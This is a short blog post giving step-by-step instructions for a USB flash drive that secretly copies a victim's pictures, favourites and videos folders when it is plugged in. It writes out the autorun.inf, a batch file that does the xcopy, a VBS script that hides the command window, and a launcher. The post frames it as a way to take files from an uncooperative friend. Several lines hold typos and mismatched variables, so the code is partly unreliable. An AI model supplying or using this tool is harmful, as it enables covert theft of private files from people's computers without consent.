top of page

STEAL FILES FROM A COMPUTER

  • Writer: piyush shukla
    piyush shukla
  • Oct 31, 2017
  • 2 min read

Has it ever happened with you that you want something from a friends PC and he being an arrogant ass just ignores you or tells you that BAAD MAI deta hun or 5 min. baad aaiyo. Well creating a Sinister USB FLASH drive will solve all your problems.

Step-1

Open Notepad (i recommend ++) and copy paste the following lines. [autorun]

icon=drive.ico open=launch.bat action=click OK to Run shell\open\command=launch.bat Save this as autorun.inf

The "action=" command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click OK or run the file. This code acts as a backup just in case if the user is asked what to open. NOT REQUIRED IF YOU ARE OPERATING THE COMPUTER.

The "shell\open command" also acts a backup in case the user clicks camcel instead of open when prompted. This code will execute when the drive letter is clicked on.

STEP-2

Open notepad again anc copy paste the following commands @echo off :: variables /min SET odrive=%odrive:~0,2% Set backupcmd=xcopy /s /c /d /e/ h/ i /r /y echo off %backupcmd% "%USERPROFILE%\pictures" "%drive%\Gajab\My Pics"

%backupcmd% "%USERPROFILE%\favourites" "%drive%\Gajab\Favourites" %backupcmd% "%USERPROFILE%\videos" "%drive%\Gajab\videos". @echo off cls Save this as file.bat The file is configured to copy all the contents of the current users pictures, favourites, and videos folder to the flash drive under a folder called "Gajab" The first file path "%USERPROFILES%\pictures"- is the target The second path "%USERPROFILES%\Gajab\My pics"- is the destination. STEP-3 Open notepad once again and copy-paste the following line. CreateObject("Wscript.Shell").Run """" & Wscript.Arguments(0) & """", 0, False Save this as invisible.vbs This code runs the file.bat as a process so it does not show the CMD prompt everything the batch file is processing. STEP-4

Open notepad one last time and copy-paste the following line wscript.ex \invisble.vbs file.bat Save this as launch.bat STEP-5

Copy all the files created in the above steps and put it on the root of the flash drive, including the icon file if needed. Also create a folder named "GAJAB" where all the contents are to be copied automatically. You can name this folder by any name, but then you need to reflect the changes you made in STEP-2. This is all that needs to be done.


Comments


RECENT POST
  • Grey Instagram Icon
  • Grey Google+ Icon
  • Grey Facebook Icon
bottom of page